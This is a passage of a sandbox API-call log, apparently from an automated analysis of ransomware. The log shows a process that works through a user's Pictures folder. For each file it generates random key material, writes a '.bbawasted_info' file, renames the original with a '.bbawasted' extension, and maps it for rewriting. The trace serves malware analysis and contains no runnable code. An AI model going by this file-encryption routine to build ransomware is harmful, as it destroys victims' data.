dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.912] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0074.912] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\-BceFOt4.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\-bcefot4.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.912] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.913] SetEndOfFile (hFile=0x120) returned 1 [0074.913] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.913] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.913] lstrcpyW (in: lpString1=0x5bec28, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\-BceFOt4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\-bcefot4.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\-BceFOt4.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\-bcefot4.bmp.bbawasted")) returned 1 [0074.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\-BceFOt4.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\-bcefot4.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.914] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.916] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.917] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be748 | out: pbBuffer=0x5be748) returned 1 [0074.917] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.917] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.917] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.917] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.926] SetEndOfFile (hFile=0x120) returned 1 [0074.928] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.928] CloseHandle (hObject=0x120) returned 1 [0074.961] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beba0 | out: hHeap=0x580000) returned 1 [0074.961] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.961] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.961] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\9RorYHmPqdNCUwMOGlae.bmp") returned 80 [0074.962] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5beba0 [0074.962] lstrcpyW (in: lpString1=0x5bec40, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.962] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0074.962] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.962] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0074.962] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\9RorYHmPqdNCUwMOGlae.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\9roryhmpqdncuwmoglae.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.965] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.966] SetEndOfFile (hFile=0x120) returned 1 [0074.967] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.967] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.967] lstrcpyW (in: lpString1=0x5bec40, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\9RorYHmPqdNCUwMOGlae.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\9roryhmpqdncuwmoglae.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\9RorYHmPqdNCUwMOGlae.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\9roryhmpqdncuwmoglae.bmp.bbawasted")) returned 1 [0074.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\9RorYHmPqdNCUwMOGlae.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\9roryhmpqdncuwmoglae.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.968] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.970] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.971] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be748 | out: pbBuffer=0x5be748) returned 1 [0074.971] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.971] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.972] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.972] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.028] SetEndOfFile (hFile=0x120) returned 1 [0075.030] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.030] CloseHandle (hObject=0x120) returned 1 [0075.031] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beba0 | out: hHeap=0x580000) returned 1 [0075.031] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0075.032] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.032] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.032] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\bvgg.bmp") returned 95 [0075.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c8) returned 0x5bf070 [0075.032] lstrcpyW (in: lpString1=0x5bf12e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.032] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0075.033] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.033] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\bvgg.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\bvgg.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.034] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.035] SetEndOfFile (hFile=0x120) returned 1 [0075.035] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.035] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.035] lstrcpyW (in: lpString1=0x5bf12e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\bvgg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\bvgg.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\bvgg.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\bvgg.bmp.bbawasted")) returned 1 [0075.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\bvgg.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\bvgg.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.035] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.037] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0075.038] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.038] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.038] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0075.039] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.039] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.047] SetEndOfFile (hFile=0x120) returned 1 [0075.049] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.049] CloseHandle (hObject=0x120) returned 1 [0075.050] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0075.050] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0075.051] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.051] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\x9zFaCNet.png") returned 100 [0075.051] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2d2) returned 0x5bf070 [0075.051] lstrcpyW (in: lpString1=0x5bf138, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.051] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.051] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0075.052] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.052] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\x9zFaCNet.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\x9zfacnet.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.053] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.054] SetEndOfFile (hFile=0x120) returned 1 [0075.054] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.054] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.054] lstrcpyW (in: lpString1=0x5bf138, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\x9zFaCNet.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\x9zfacnet.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\x9zFaCNet.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\x9zfacnet.png.bbawasted")) returned 1 [0075.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\x9zFaCNet.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\x9zfacnet.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.055] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0075.057] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0075.057] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.057] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.057] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0075.058] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.058] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.067] SetEndOfFile (hFile=0x120) returned 1 [0075.069] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.069] CloseHandle (hObject=0x120) returned 1 [0075.118] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0075.118] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0075.119] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.119] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.119] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\wOqR2Gqg.png") returned 88 [0075.119] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ba) returned 0x5d2c68 [0075.119] lstrcpyW (in: lpString1=0x5d2d18, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.119] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.119] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0075.119] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.120] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\wOqR2Gqg.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\woqr2gqg.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.120] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.121] SetEndOfFile (hFile=0x120) returned 1 [0075.121] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.121] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.121] lstrcpyW (in: lpString1=0x5d2d18, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\wOqR2Gqg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\woqr2gqg.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\wOqR2Gqg.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\woqr2gqg.png.bbawasted")) returned 1 [0075.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\wOqR2Gqg.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\woqr2gqg.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.128] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.130] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5b8e48) returned 1 [0075.131] CryptGenRandom (in: hProv=0x5b8e48, dwLen=0x1b8, pbBuffer=0x5b8c88 | out: pbBuffer=0x5b8c88) returned 1 [0075.131] CryptReleaseContext (hProv=0x5b8e48, dwFlags=0x0) returned 1 [0075.131] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5b8e48) returned 1 [0075.132] CryptGenRandom (in: hProv=0x5b8e48, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.132] CryptReleaseContext (hProv=0x5b8e48, dwFlags=0x0) returned 1 [0075.194] SetEndOfFile (hFile=0x120) returned 1 [0075.196] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.196] CloseHandle (hObject=0x120) returned 1 [0075.198] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c68 | out: hHeap=0x580000) returned 1 [0075.198] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0075.199] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.199] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\62UB-DXQ3.bmp") returned 69 [0075.199] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x294) returned 0x5d2c48 [0075.199] lstrcpyW (in: lpString1=0x5d2cd2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.199] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.199] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0075.200] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.200] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\62UB-DXQ3.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\62ub-dxq3.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.200] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.201] SetEndOfFile (hFile=0x120) returned 1 [0075.201] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.201] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.201] lstrcpyW (in: lpString1=0x5d2cd2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\62UB-DXQ3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\62ub-dxq3.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 